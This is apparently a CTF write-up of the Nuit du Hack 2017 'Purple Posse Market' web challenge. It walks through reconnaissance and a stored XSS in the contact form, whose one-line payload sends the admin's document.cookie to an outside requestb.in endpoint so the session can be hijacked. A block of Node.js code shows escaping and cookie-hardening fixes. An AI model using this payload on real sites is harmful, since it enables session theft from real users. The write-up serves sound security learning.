Here we go with another write-up! This one is from the Nuit du Hack 2017 Quals CTF that took place on April 1st 2017!
The following article describes the solution to the Purple Posse Market web challenge!
We participated with SwissMadeSecurity and ranked 99th/378!
Step 1: Reconnaissance
You work for the government in the forensic department. You are investigating an illegal website which sells illegal drugs and weapons; you need to find a way to get the IBAN of the administrator of the website.
The target was a drugs and weapons e-commerce website that looked like it came straight from the great era of 90s web design:
Navigating through the menu, we found an about page with some information about order processing and other details:
Plus, a simple page listing all products:
When a product was selected, we were redirected to /product/product_id, where we could find detailed information about the chosen product and a simple form requesting our email address and the desired quantity:
We also noticed that some products were not available:
Last but not least, we discovered a contact page displaying a message stating that an admin would read our message, and that he was currently connected:
Poking around with various URLs, we found an admin panel at /admin that redirected us to
We then checked the cookies to see if there was something interesting:
We found an interesting cookie named connect.sid.
Considering all this, after a quick and efficient recon, we could reasonably assume that the contact form was vulnerable to XSS (Cross-Site Scripting), which would allow us to steal the admin's session cookie, log in as him and (maybe) find his IBAN.
Let's now validate our assumptions!
Step 2: Vulnerability Testing
We set up a requestb.in endpoint and injected the following payload into the contact form:
var i = new Image();i.src="http://requestb.in/1kxo2b11?cookie="+document.cookie;
As expected, the admin cookie was sent straight to our bin:
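For the defensive side of this chain, here is an added example (not part of the write-up or the challenge's code) in plain Node.js showing the two server-side fixes that would have broken it: escaping stored contact messages before the admin panel renders them, and checking that the session cookie (the Express default name connect.sid seen above) is issued with HttpOnly, Secure and SameSite. The message and cookie header values are constructed sample data.

```javascript
// Added example, not from the write-up: two hardening checks for the attack chain
// described above (stored XSS in a contact form -> session cookie read via
// document.cookie). No dependencies; runs with plain Node.js.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape untrusted text for use as HTML element content.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Render the admin's view of one contact message. Because the body is escaped,
// a stored "<script>" payload is displayed as text instead of being executed.
function renderContactMessage(msg) {
  return `<li><b>${escapeHtml(msg.email)}</b>: ${escapeHtml(msg.body)}</li>`;
}

// Parse one Set-Cookie header value and report which hardening attributes are
// missing for the named session cookie. HttpOnly is the one that stops
// document.cookie from exposing the session id; Secure and SameSite are the
// usual companions. Returns [] when fully hardened, null if it is another cookie.
function missingCookieAttributes(setCookie, cookieName = 'connect.sid') {
  const [pair, ...attrs] = setCookie.split(';').map((s) => s.trim());
  if (!pair.startsWith(cookieName + '=')) return null;
  const present = new Set(attrs.map((a) => a.split('=')[0].toLowerCase()));
  return ['httponly', 'secure', 'samesite'].filter((r) => !present.has(r));
}

// Constructed sample data (hypothetical values, not from the challenge).
const hostileMessage = { email: 'x@example.test', body: '<script>alert(1)</script>' };
const weakCookie = 'connect.sid=s%3Aabc.def; Path=/';
const hardenedCookie = 'connect.sid=s%3Aabc.def; Path=/; HttpOnly; Secure; SameSite=Lax';

console.log(renderContactMessage(hostileMessage));
console.log('weak cookie missing:', missingCookieAttributes(weakCookie));
console.log('hardened cookie missing:', missingCookieAttributes(hardenedCookie));
```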
Step 3: Flag!
We then went back to the admin panel, replaced our cookie with the stolen one using the handy EditThisCookie Chrome extension and refreshed the page.
We got the desired effect!
We only had to submit the IBAN as-is to the scoreboard to complete the challenge.